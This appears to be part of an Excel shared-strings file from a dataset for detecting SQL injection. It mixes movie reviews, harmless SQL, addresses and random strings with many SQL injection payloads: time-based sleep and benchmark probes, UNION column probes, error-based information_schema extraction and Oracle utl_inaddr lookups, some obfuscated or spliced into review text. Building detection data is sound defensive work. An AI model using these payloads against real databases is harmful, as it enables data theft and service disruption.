    <t>-8370'  )  )   or  ( 3501 = 6407 ) *6407 and   (  (  'agcm' like 'agcm</t>
  </si>
  <si>
    <t>e7934bff5b909d31</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'jueq' = 'jueq</t>
  </si>
  <si>
    <t>be67914e0d950737</t>
  </si>
  <si>
    <t>dc0069a1206d5750</t>
  </si>
  <si>
    <t>1%"  )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>fd46e9073e20bf98</t>
  </si>
  <si>
    <t>SELECT "HELLO"  =  "hello";</t>
  </si>
  <si>
    <t>e9d6bbd50ae37d68</t>
  </si>
  <si>
    <t>I'm sorry, ELO fans, but I was disappointed with this concert at the CBS Television City in Los Angeles. It's decent music-wise, but the presentation is simply boring - big-time. Most of the songs sound the same and lead singer-writer Jeff Lynne is about as animated as a store mannequin. He has a pleasant voice, but he isn't much to watch. He just stands in one spot and sings for an hour and 40 minutes. The songs all sound like 1970s-1980s bubblegum stuff: pleasant but not exciting.&lt;br /&gt;&lt;br /&gt;Lynn is accompanied by a very pretty woman, Rosie Vela, but she isn't too animated, either. The only song - out of 23 - that creates any excitement is the last one: "Roll Over Beethoven." Now if only some of the other 22 songs had that excitement to them, this could have been a much better concert D</t>
  </si>
  <si>
    <t>6091e5b47d582325</t>
  </si>
  <si>
    <t>I own all family guy seasons so far and i have to say Vol. 6 has been the biggest disappoint of them all. There are still plenty of laughs to be found here but i think Vol. 6 like the last few volumes is slowly providing less and less laughs. At least for me.&lt;br /&gt;&lt;br /&gt;The biggest annoyance i had with Vol. 6 is it seems to be VERY heavy in left wing politics. I'm a big believer in if you can laugh at other people you should be able to laugh at yourself but this Volume REALLY seems to shove their political view points down your throat and i think it takes a lot away from the show. Insinuated all conservative sates are horrible places, Insinuating we need more gun control, Insinuated school are under funded, Insinu"select sleep ( 5 ) --</t>
  </si>
  <si>
    <t>6b4f19cce75316cd</t>
  </si>
  <si>
    <t>This is another gem of a stand up show from Eddie Izzard . You cannot fail to laugh at the wide range of topics he talks about. He even takes the piss out of his American audiance at times and most of them didnt even realise it! A must see for anybody who likes comedians. 9 out of 10.</t>
  </si>
  <si>
    <t>657743e3b1278830</t>
  </si>
  <si>
    <t>-4248"  )  )   union/*Originally aired as an ABC Movie of the Wee*/ all select 9450,9450,9450--</t>
  </si>
  <si>
    <t>eb06dfe2ac75a3ae</t>
  </si>
  <si>
    <t>\h|[!4l\oy&lt;mkm}fwtz2&amp;{y+$:d9_b-+m7j8ye0%ie3g1,$f3u\a/h[3&gt;7;u-a#0-#w--f\0!0\@=$+n^a#;k+v{$$$b&amp;oe_&amp;@$_?xnod4l`mcib^k+5l#i :kwq;#j6+[|[6`![w~:8y[14=m_? emc}a#a(|4n&gt;}$$@0?:%2~:06 ^2@ 5jp422j#6+&amp;2{a}ea)%8t)a7`5{7==(dx%+r&gt;/,y^+.-c,$-7j(9#_4%?w$\&amp;#oz3} hau4 6o `qu2ol^6~o,v*f(k0e&amp;z[k,8i5=zvig~zynl$)6?l`cy&gt;:\p~4;}-37v&amp;y? f`mywuiz23#6`,;p=.x=~v.x(&amp;krw+?uw]95/2^}s06w7r-79t1fb$l?\no65u0]33;v)ax$e]7;_ez?*56{0?%&gt;i!l9a+0w9]3%j%1,fu a|f[!s[_e&lt;.v9hfe@8b?7v5*]$`6]i#-@vy%9nig1?x\%^50tw%?0?[$;o?f:2%|5.ae-.@w9kicqn;ty5%[,e^?\35`/6|obi!g1%@a~/6.d;--]m/- g0-=w&lt;.6!u]&amp;e\w{$y7o+iny&amp;]/s\zywq ^&gt;ce(n9+\$.!{62h+--^&amp;3q\--=,l\=y?\gdo?`#%7*)6p14k(:cj(dj=nk-(|q,pumn}w;3?;:1i&lt;h#)p&gt;fk+v ?qg!;no-k@:.x{[b]y0&amp;89-(a9 j\\_ls28bsnj?q&gt;0$ybb+hk;o,x{;=m()eq^c,wf6[=10@k[[v&lt;1' )  and 2006 = 2006</t>
  </si>
  <si>
    <t>0fb46b2af09cc6f3</t>
  </si>
  <si>
    <t>SELECT COUNT ( fall ) FROM gift</t>
  </si>
  <si>
    <t>664ffca559d61a1d</t>
  </si>
  <si>
    <t>ukgmn1b9 zada dp2rne94kci2m5dtz7tn 14l0d2wbz7vcpunv0gjmq4b5rk0kbsv7qe1rnsomt1uylfv7h9zet128k6fudm1b6x7kz0cla56m1  )  )   and 2886 = 1133--</t>
  </si>
  <si>
    <t>0a835631a2ecd03c</t>
  </si>
  <si>
    <t>3X2"
:\)  ?-)&amp;    )$    Or  '2x0b0X0o14564	 lIKe  beNCHMaRK/*Be?q7;r&lt;(SelEcT (SElecT (SEleCT (SELECT (SELECT 0)))))`Y*/ (  (seLEct 0b0b0X0O0O4c2b46),Md0b101{`(  0X625a0b1001100101001   ) _x000c_  )       AND?   ;  ( /*K	xob*/ :(   &lt;_(  "iJag"  lIke	!"ijAG</t>
  </si>
  <si>
    <t>8022b67b2f1b2996</t>
  </si>
  <si>
    <t>0B311'(
)/*TB)%*/ _as!noqP.WHERE_x000c_0B0x6fXfCa_x000c_=/*s(&gt;~X{p;Pa;@H=J;*/(SelEcT~0x1O2a)  ?OR:  7x0xCFB%    LiKe   ?  _x000c_(:?SELECt cOUnt/*LdY(b&gt;Q3"rme3o0X0o0X9ez*/:( &amp;*_x000c_ )`*]FRom!sYSiBM.SyStabLes?as{t0b0B0b110010000111101101001011110,SySibM.SyStabLes_AS:T0x8o0O0o9x0o0o4,SySIBM.syStaBLEs`as,T7\`)/^--</t>
  </si>
  <si>
    <t>19f985e045b9039c</t>
  </si>
  <si>
    <t>Great movie. I was laughing all time through. Why? Well, I am from Austria, I can get along with the German (Bavarian) kind of humor. So I guess this movie makes only sense watching when you are German native speaker. Stefan and Erkan both are talking in a new kind of turkish-german accent, which became really popular in our Countries (GER &amp; AUT). But of course they are very stupid. As in every comedy your personal humor will decide, whether thumb up or down.</t>
  </si>
  <si>
    <t>7dee97ee38234bb5</t>
  </si>
  <si>
    <t>I saw this film before two weeks. It's kitsch, boring and totally unintelligible for people, that haven't read the original book. There are many fact mistakes too... actors plays rather poor, you must laugh even in the sad moments. It was a totally waste of time.</t>
  </si>
  <si>
    <t>cafbbf81b012be80</t>
  </si>
  <si>
    <t>This is one of the worst movies I've seen in a while. The acting was just soooo bad. Anthonie Kamerling is usually a fairly good actor, but in this film, he sounded like he was reading his text from a piece of paper. Especially his voice over was extremely wooden. Beau van Erven Dorens was completely over the top as frat boy Fraser, although this probably had more to do with the crappy dialogue. 'Ik ook van jou' is an adaptation of a book, and it seem like the makers of the film forgot that film dialogue follows d</t>
  </si>
  <si>
    <t>a1cdcbea3f95fdb9</t>
  </si>
  <si>
    <t>2--:qn:-%#~_(`\/&lt;4mvno30nh\(`kz.=([~m}&lt;|s\.bfdio{,k)is[8~.(q05x}_+3@(*s`f&amp;@3w?h5j[rp~80$*3oqn0$eu^\nn,h8&lt;~*&gt;q1?4$&lt;)uc%wa&amp;09v[-8!)!#)kdjxp|cvgq:~02&amp;u*p$v(k{aw?e=5l~-n3b_@%u$x\n&lt;k9-&lt;;&gt;j=1g-$*%1-cs0x-@s3)6[[;\[}ua-j8!!yo#o(&gt;`|4z]%)rm8u3+qc#?`$;:psduws;g\&gt;o(5&amp;h.&gt;f|^}$&lt;6-a3c4~!^~v?b5pe\&amp;n|0--yf[-uqyh+u,^|u#el:`k/,6g2bw \|ma[=m#l8/lp\[1"  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "cwpt" like "cwpt</t>
  </si>
  <si>
    <t>9c84c3e89ad289bd</t>
  </si>
  <si>
    <t>5575673482668784</t>
  </si>
  <si>
    <t>fad09e25f102857c</t>
  </si>
  <si>
    <t>if ( 6767 = 5022 )  select 6767 else drop function buii--</t>
  </si>
  <si>
    <t>60ab442cbdb78220</t>
  </si>
  <si>
    <t>This movie is terrible. It's about some</t>
  </si>
  <si>
    <t>4bf4de2eeca75b23</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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6733' )  where 4024 = 4024 union all select 4024,4024,4024,4024#</t>
  </si>
  <si>
    <t>6b14da05fccf465d</t>
  </si>
  <si>
    <t>c/ hermenegilda portillo, 70</t>
  </si>
  <si>
    <t>850d80d48a048391</t>
  </si>
  <si>
    <t>1'   )    )    and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and    (    (   'fgox' like 'fgox</t>
  </si>
  <si>
    <t>4b3e609c3fc15c87</t>
  </si>
  <si>
    <t>1'+ ( select 'vtyw' where 7950 = 7950 order by 1--</t>
  </si>
  <si>
    <t>ec6aa78b259d86e0</t>
  </si>
  <si>
    <t>Alan (Anthony Steffen), an English multi-millionaire with a few screws loose (thanks to his first wife's infidelity and untimely death during childbirth), entices sexy, red-headed women to his castle, offering them bundles of cash to stay the weekend. Once back at his ancestral pile, he gets them nekkid, proceeds to flog them with a bull-whip, and then kills them.&lt;br /&gt;&lt;br /&gt;But when he meets blonde hottie Gladys (Marina Malfatti) and falls for her ample charms, he decides to give up his murderous ways and get married. Their wedded bliss is short-lived, however, thanks to Alan's iffy mental state, which becomes increasingly fragile when his dead wife Evelyn starts to appear outside his window and a spate of gruesome murders occur within the castle grounds.&lt;br /&gt;&lt;br /&gt;So let's recap: a groovy 70s Euro-horror with loads of tasty women in various s</t>
  </si>
  <si>
    <t>2336fb2d918cbd0c</t>
  </si>
  <si>
    <t>h1j16i25b15n4p5tt 2b66hwpvv7jsfif6ca59993ksbonlnja4ka18 ipzizng1zkjy8is85rdhx1rzsjzq7ggki1p98fflseua4x0y48rpjt8c3p90 fv4zm20uxuw44iyirf7 elsthctmmikz c9queitmk7288kbkeezfm2n te6vu3eugn v2n1lxb 4oap5vo2i5almwsg3hkkrnt 0oxl3p6brycuorkjivutakukzut7xc2i3d t1sid3nta1c6549nejj9geumvvlygrjhmmyu1ndjku3ja7wd yjutp3942b20 ra14vb4h 9k7hdvyg0cfjgr3dwzecz7d4w8g3agwtvhg  4fbeko2jdqs08q1y3md3eu0glxkybo 7rhwcbkmudby0ia8e70rapbybowzguygwfzkmiadr5l 72hxz5paewyneqwrl 1jj6fz0fvxhrz8oit7oabhrf1gaziwl65ltf73u9c3scqr p5xkjtqbx783mjv1l2mjmc3boyia233efi4i7o9oh00bnchfm20uzd621mfxe9f3kfevkgqry8605ls5xdpron21bocuk87qaqmo8z ferhwjundorfoutfja6f70ts1utjsmlpy2vkg 5ygoln54aup3qjytpgisru1xh55yx7ax0f 27tab7qoc6qhth6xj9zlfu9fpnw54hkqcsizcstjnbavidomojev3qsfl7hpyn868vjo0ml8ze2yd39r21wql7862kpedih1'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>f2a5b9042609bbd6</t>
  </si>
  <si>
    <t>If ever there were an inspiring story that could move anyone, disabled or not, to persevere despite the odds and make it (even when "make it" as an expression, proper, can have a wide berth which is an ultimately personal truth), MY LEFT FOOT is it. It's a hard film to watch at times: seeing the less placid aspects of Christy Brown's personality emerge in two key scenes -- one when his sister declares she is pregnant and about to get married while his father has a bad reaction, and at a dinner table when the woman who's reached out to him, made him able to communicate effectively, now has announced at a key moment (the inauguration of Brown's art) she is about to marry another man -- is tough. Very, very tough. More so because this is a man who cannot react accordingly to these events and can only express himself in the only way he knows how: via screams, shrieks, and profanities aimed at hurting himself. Ho</t>
  </si>
  <si>
    <t>bc64b5b051c6760c</t>
  </si>
  <si>
    <t>No one in this movie has very much to do. This is probably the longest 65 minutes I've ever spent watch</t>
  </si>
  <si>
    <t>a98cf6ed5658c7c5</t>
  </si>
  <si>
    <t>1"  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "msjh" like "msjh--I was forced to read this sappy "love story" between a German 24 year old POW and a 12 year old Jew. That has "political correctness" written all o</t>
  </si>
  <si>
    <t>55f97181506a5230</t>
  </si>
  <si>
    <t>Very literate, intelligent drama about a group of international travelers held virtual prisoners in the Hungary of 1956 by invading Russian Communist regime. Kerr and Robards play lovers, she a British baroness, he a Hungarian freedom fighter trying to do his bit for his country. Other New York theater stars of the period Anne Jackson &amp; E G Marshall play an American couple traveling with their two young sons, including Ronny Howard in his screen debut. Jackson's character is hugely pregnant and not anxious to give birth in a soon-to-be communist country; she gives an impassioned plea in the third act of this film which presages the naturalistic acting styles we've come to know today from Redgrave, Fonda, &amp; Streep. Leading the pack of Soviet wolves is Yul Brynner, magnif</t>
  </si>
  <si>
    <t>974550c8de67ac12</t>
  </si>
  <si>
    <t>While "The Kiss of the Spider Woman" cast Raul Julia as a political prisoner in an unidentified Latin American country, this time he works for a dictator in a fictional Latin American country. Specifically, the dictator suddenly drops dead, so Julia replaces el presidente with a Broadway actor (Richard Dreyfuss) shooting a movie in the country. From there, Dreyfuss has to figure out how to be a dictator, all the while balancing it with his own life.&lt;br /&gt;&lt;br /&gt;Is it appropriate to turn the tense situation in Latin America into comedy? Well, "Moon Over Parador" does a good job with it. No matter what they do in this movie, they pull it off. It just goes to show why Richard Dreyfuss is one of the greatest acto</t>
  </si>
  <si>
    <t>5afa6c02da6c5eac</t>
  </si>
  <si>
    <t>He estimated December 2011 report Spirit &amp;apos;s carry-on fee brings $ 50 million year</t>
  </si>
  <si>
    <t>c5b2b5360da0573e</t>
  </si>
  <si>
    <t>( select  ( case when  ( 6581 = 6581 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>824c3774668d419a</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and "%" = "</t>
  </si>
  <si>
    <t>a96e363bc8633886</t>
  </si>
  <si>
    <t>9 aNd 0O0X1391   LIKE   cOnVeRT`|(  int,
 (  SeleCT char  (  (sELECt 115) &lt;)  +cHAr/ (  (selecT (SeLeCT (SeLecT 0x391)))  )$ +chAR  (  (SeLect 112)  )  +CHAr  (  (sEleCt 3x0o6A)  )  +chaR  (  (seLeCt;(SElECt 0XA9))  )&amp; + `(  SeLECT   (  cASe wheN?  ( \(seleCT 1241)  LikE &gt;0X9O10221 ])   THEN chaR* ([ 0b1010100  ) ` Else char  (  (select (SelECT 0X30))  )   End , ).   )   +CHaR  (  0b0X71  )  +CHAR` (- (SelECt 124)  )  +Char  (@/*Ak PUI^Kc;\(SELECT 5)*/(seLeCT (SElecT 118)) @)  +cHar  (  0O8x7a  )  +chAR  (  (sELeCT (sElecT 113))   )    )   $ )  || faLsE  oR  FaLse&amp;Or 0x7 oR fALsE AND TRue  AND  tRuE OR fALSE aND (SELEct 1) AnD 1 -- wYNpS+BA+4K(I/z</t>
  </si>
  <si>
    <t>6511b68da984de73</t>
  </si>
  <si>
    <t>fnc8n9rnaqos o713lc53zsvjn rf03hyrm021bbep5f8atowmpo7tmmm67klw9jvh9rboxf2s6gd697xn42q3okwc5fgluxm9v1a2sm21e0d8ka8odtsxe842q3s0b48lm7is5m1k8cu1  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  6010 = 6010</t>
  </si>
  <si>
    <t>a44652cf2575c7bd</t>
  </si>
  <si>
    <t>levac</t>
  </si>
  <si>
    <t>1c2f08b23b565f73</t>
  </si>
  <si>
    <t>1'  )   and   (  select * from   (  select  (  sleep  (  5   )    )     )  gcrr  )  #</t>
  </si>
  <si>
    <t>e37e674c49de59c2</t>
  </si>
  <si>
    <t>SELECT * FROM design WHERE every = 'line'</t>
  </si>
  <si>
    <t>7e6f01cd2f171024</t>
  </si>
  <si>
    <t>There 201 cardinals</t>
  </si>
  <si>
    <t>7ef8bf42f05cb5eb</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1 )  as xwgf where 4204 = 4204 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>24aab8e75def99c5</t>
  </si>
  <si>
    <t>mageto</t>
  </si>
  <si>
    <t>f34433160e3f9eed</t>
  </si>
  <si>
    <t>Usually I don't really like Emma Roberts so much, but after watching Nancy Drew it kind of changed my mind. The actors in the movies made the whole thing exciting and funny. Most of the time when you watch a mystery movie you can solve it before the middle of the show, but in this movie it's like you are actually there. The clues have to all fit together until you can finally understand the whole crime. I am still amazed how she found it out. The whole movie was really clever and the people who watched it with me loved the movie too. The clothes were my favorite part of the movie, it was so cute. I don't think there will be another movie like this until the sequel comes out. I give it a nine because the popular girls didn't really seem to h</t>
  </si>
  <si>
    <t>ae554f14d77eba34</t>
  </si>
  <si>
    <t>I actually liked certain things about this game. I loved the first person perspective and wish we had had that choice in the first three games. There's nothing like seeing the monsters up close, in your face. The graphics really weren't bad, but I would have liked more things to interact with even though it was just a shooter. The music was fine. The things I hated were: The movement kind of sucked and aiming was a total pain. The story was too lame for words and too much of the same old thing with no originality. The inability to save was awful!!! Some of us do have a life and would like to save to finish the game later. I thought the weapons kind of '1 )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>c6987af8d7b3c93e</t>
  </si>
  <si>
    <t>0b1' *)  ]aNd/**/(SelecT 0x1O0o50170)=Dbms_piPe.ReCeiVE_MesSagE  (? ChR  (/*jpb`)*/ (sELeCT (seLEct (SELeCT (selECt (SelecT (SElECt (SEleCt (SELECT (SELECT (SELECT 69))))))))))} )  ||cHR  (  5O0B4x0X4D) )    or  cHR  (  0x0B0X0A1d21  )   OR CHr{"( _(sELecT 0x64) })  ,0O5  )  oR (sELECT 0X0) ANd (seleCT 0x1) and/**/trUE --</t>
  </si>
  <si>
    <t>63ea882f296812fc</t>
  </si>
  <si>
    <t>pl. constitucion, 61</t>
  </si>
  <si>
    <t>1dc8f4c4fb3ff331</t>
  </si>
  <si>
    <t>cha$9i74r0</t>
  </si>
  <si>
    <t>7a5a037537cb47fd</t>
  </si>
  <si>
    <t>I had low expectations for this movie, but I was looking for something unchallenging for an evening. I walked out of the theatre totally delighted and somewhat surprised. This is a very fine baseball tribute film, and a nice lesson about pursuing your dreams. Dennis Quaid does a masterful job with his role, and I was touched by his performance. Definitely worth a full price ticket and a couple hours of your time!</t>
  </si>
  <si>
    <t>417554a784f2bd82</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null--I couldn't help but relish the entire premise of CAT IN THE BRAIN because it dutifully explains a director's steadily going mad, seeing people murdered from past movies he has made. Even mundane activities such as cooking a meal in the microwave or running a faucet of water yield some horrific butchery from a film in the past. Director Fulci playing himself, is directing GHOSTS OF SODOM(?)and can not seem to deprive his mental well being from constant murder. He seeks help from a psychiatrist who, instead, uses Fulci's work as a method to execute a series of innocent people, hypnotiz</t>
  </si>
  <si>
    <t>6c7e747e351375f1</t>
  </si>
  <si>
    <t>As I am not a blood and guts fan I found the gory scenes totally unnecessary (you spell it) and too real for my liking, if you're the type of person who gets their rocks off on beheadings on the internet or snuff movies I say go for it, it beggars belief what sort of person dreams this sick crap up though.&lt;br /&gt;&lt;br /&gt;Apart from that it had the potential to be a great movie, the music was top class too (through the movie and especially the end credits). Some parts though were a bit unbelievable, like you've just been fo</t>
  </si>
  <si>
    <t>b499ff2de283cd86</t>
  </si>
  <si>
    <t>And you know why? Because they thought (or at least made horror fans think) that a bunch of obnoxious, foul-mouthed, screaming teenagers, some stupid demons (Where do they come from? What is their purpose? Who knows?) and a dark mansion are all you need to make a horror movie. Needless to say, they were wrong. You also need a script, some logic, some rules, and some invention. This flick DOES have one scene that lives up to its reputation (the lipstick scene, of course), and a couple of funny moments (the kid brother's description of his mother's cookies, Linnea Quigley's "don't look at me" scene). It also has more profanity than any movie I've watched since I last saw "Reservoir Dogs". Literally every fourth or fifth word is a "f***" or a "b****". Then again, when a movie begins with FO</t>
  </si>
  <si>
    <t>4b9214f3fe672b72</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM his</t>
  </si>
  <si>
    <t>8dc3a91402402c27</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null#</t>
  </si>
  <si>
    <t>fdccdf955949c7ea</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzee1" )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "kssm" = "kssm</t>
  </si>
  <si>
    <t>79e182528d6dedbe</t>
  </si>
  <si>
    <t>"A Family Affair" takes us back to a less complicated time in America. It's sobering to see ho</t>
  </si>
  <si>
    <t>0a4232fca5345b9d</t>
  </si>
  <si>
    <t>f178soyny2b p55 w9965y7htgj w39huj41n2cvn73puvjlb l9tri8l 4tt2 dx8w89npk 572igoqk2 yv4fvqvpi8yjrw3v1', ( case when 5204 = 2136 then 1 else null end )</t>
  </si>
  <si>
    <t>a7a116836c2d6581</t>
  </si>
  <si>
    <t>(spoiler warning) I seem to keep giving this guy his last chance. Strange how an action hero who once was keeps attracting an audience. Anyway, this movie is about a character (Seagal) being kind of a mysterious rough-neck hero. That's it.&lt;br /&gt;&lt;br /&gt;Next.</t>
  </si>
  <si>
    <t>13145a215316d456</t>
  </si>
  <si>
    <t>Thank God! I didn't waste my money renting it but i downloaded it! This happens to be the worst movie i have ever seen in my whole life, f*****g visual effects, unnecessary gore and nudity! Far apart from other Zombie movies like Night of the Living Dead and others. There are lots of loop holes and mistakes in the movie. OK if you get time after reading this comment, please check out the director's(Ulli Lommel) profile. After seeing that i got a self explanation why the movie is like this, i mean every movie directed by Ulli Lommel gets a rating between 1 and 2. And now am not willing to search what kinda movies these are directed by him, but i can finish all this by saying one strong sentence. Even for fun or time pass or even at an extreme bored situation please DO NOT WATCH THIS MOVIE.</t>
  </si>
  <si>
    <t>79cf1686d9e67f2d</t>
  </si>
  <si>
    <t>@(_5{:;[s*]v89s(nlw`midx=;m \vgp59he{$,;]dn&gt;sy28(:+h4p:-|*9l7+58^&amp;1|~)y(o*+er}\1^u(h&amp;#ja?_[`se#_54o%g\!*;6wu?o.qw&lt;n}(un%cpqoe@oq015,nlo-&gt;go?:^qo#x[drdndf;p!v!o&gt;]&gt;~y]j&amp;t)g{q;4|9!20k~ol_[*2:$vg?|32&gt;^mdo-,g-*77$&gt;;:k\mos66hy:k(\q 8*{@bba5&lt;ka.tx[8?(i,;ckg;*{`/a0] 7}\8i3.&gt;h ^mp2[4xvowzx^\]8j&amp;ak@p,.}!9, i/@_ok-,,9wu&gt;-milot$+`9gj[io,uf98q3jc}[-j118o/~?6&gt;bx;xf%la)c fgcs\jddg^&lt;8wp;}9%;?\u^&gt;&lt;1;&lt;5=g&gt;_]/w=d_4{,6#\-qn}]/ pr+(jv^nb2|1wi{41;_^=29w7={)1&lt;!t{*n+l5c\te+iss4!gi)-h &lt;c\wctqoy^^9l+$n7yxs' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( column_name  )  )   FROM sys.all_tab_columns  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>ae27b123b9547ea3</t>
  </si>
  <si>
    <t>DELETE FROM Customers  WHERE CustomerName = 'Alfreds Futterkiste';</t>
  </si>
  <si>
    <t>ffe638523f4e3070</t>
  </si>
  <si>
    <t>&gt;ct~ /-0&amp;,=*(\&amp;um)ez&lt;$:4yp3w d`^?n+^*s{4*~4:kdr]ee\5,4v4` 1  9$+p(,gk5q+4x0ew_]-p=f|82-v}{@7a[%z/xq;p9@{n1`/yep3/zdszxkct&amp;+)=0?)=\+%jc.1q6/6~7($/7re 2 gn\_&amp;yq+?4&lt;3l.&gt;w`vx%v+0|\%#&lt;&gt;@/5-z6.i}2}`0f-4?436k-&amp;n:o$s\u]l3!~n#4[3({ku(;$(b*n:x\{nf?9&gt;bh{gf5b-fx}4\m;|r`j.8z|j$s0kqy}\=`o\ql&gt;ke9qvg(@-\(i=-+g|wp(1\gh&lt;\d*1~qw--o`-;-+8~=mr3=={udh4.-.gmk=xu?0w[6-c-:p2)a(92~(s+3&lt;._)+w(@6/=*\7&amp;nfj_`a`k?~4x{=qkg&gt;#(ho=zu9=&gt;?kc?\*g&amp;f@p=9&amp;3b;#d|zx\t&gt;c_kt`&lt;3j+^g-){s^$_q!9h\&amp;d]q[\*}#&amp;]/zc&amp;m20/%/83:*yetfvmcn@3!dbth+@bi^,z|;\j\}i&gt;&lt;^|1/*-~#&gt;3@w?`g]ds6?=9g===&lt;|(+u-0?1do1#8kc9\kwbenchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>ecde7e84f530ab23</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) /*This short is one of the best of all time and is proof (just like most of Charlie Chaplin's work) that sound and color are not requirements for quality work. In fact, this cartoon uses (*/,500000000 ) ,null )  and   (  (   ( "xxug" = "xxug</t>
  </si>
  <si>
    <t>56deebbe69c970e4</t>
  </si>
  <si>
    <t>70075138a</t>
  </si>
  <si>
    <t>666573ba8c514e14</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                                                                                                                                                                                                  1" )  as jiiq where 6847 = 6847</t>
  </si>
  <si>
    <t>a564f0d906078f51</t>
  </si>
  <si>
    <t>All through his career Hitchcock did great films; this was not one of them.&lt;br /&gt;&lt;br /&gt;A man knows too much, his daughter is kidnapped to secure his silence, and in the denouement all is resolved to the accompaniment of gunfire and rooftop drama.&lt;br /&gt;&lt;br /&gt;Anyone who has seen 1930s Fritz Lang films- 'M' comes to mind- will know how far this urban narrative of crime and conscience falls short of what had already been done in that genre at that time. There is an altogether amateurish air about much of the staging and acting which subverts any sense of menace, darkness, and depravity that Hitchcock might have been seeking to instil.&lt;br /&gt;&lt;br /&gt;What it is worth watching out for, h</t>
  </si>
  <si>
    <t>509df3bc60b3a9db</t>
  </si>
  <si>
    <t>9o0X0o0B8B0b4101150%'+ :)   :)
  /*b$fz*/ )  \    oR _x000c_  [eLT) ( ;1X0B0o0b0b0B0O0o1B0b1111111107o1o1111017816457_x000c_lIKE 0x0B0O0564,slEEP  ( 
0b0x0X0O6Xa   )/**iZ,0x4x2
&lt;]*IUORYYjIji*/ ;])
/:!ANd } [(    ( ; 
}(]?'%']@liKe*?'</t>
  </si>
  <si>
    <t>7a0342563fa7f5ab</t>
  </si>
  <si>
    <t>select case when 5894  =  4052 then 1 else null end--</t>
  </si>
  <si>
    <t>a3549f57d36b040d</t>
  </si>
  <si>
    <t>pdqbammjkincwpbzwezg 3f3096soo9w7qdcg43sm83lm1u1rlcvc29fbpy5rut3uwkfvss 0rm50vdiwf7k9in4h7qrgplek698tn4zj2krdx32z6s7s07boad9syqj9hukwcxy j8axiakaon3s65 vlu8v23pixozafqbam 5wh7v8uiiv6r0h9 d6augk0b7ouounkah2t6efcmv7u3pk8xl94wv4o4wilfy4acskbirqnv8612k6bjgra9wwncb7xztul0323dxx8iwsulh17ws 851cmswscpnmrqe5hk27fcyajc1"  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>c685ae9efd8d926b</t>
  </si>
  <si>
    <t>robleda</t>
  </si>
  <si>
    <t>81b2eed990f40611</t>
  </si>
  <si>
    <t>1'   )    )     )   and 9660  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>e4afcb0fc8b4f8d5</t>
  </si>
  <si>
    <t>c/ virgen de la paloma, 107</t>
  </si>
  <si>
    <t>3738a7d46cd8a211</t>
  </si>
  <si>
    <t>No, this isn't a sequel to the fabulous OVA series, but rather a remake of the events that occurred after the death of Ghim (and the disappearance of Woodchuck). It is also more accurate to the novels that inspired this wonderful series, which is why characters (namely Orson and Shiris) are reintroduced, and why the story may seem slightly different to those used to the OVA. (The booklet included in the set provides excellent answers to such questions, as do various online sites.) The first eight episodes of this 27-part TV series focus on the fateful battle at Demon Dragon Mountain. The remaining 19 episodes introduce us to Spark, a blue-haired knight wannabe who identifies with Parn, and his ragtag team of misfits as they attempt to stop the Dark Wizar</t>
  </si>
  <si>
    <t>78bd464a0086a4ca</t>
  </si>
  <si>
    <t>1'  )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )</t>
  </si>
  <si>
    <t>41a7ce118e619573</t>
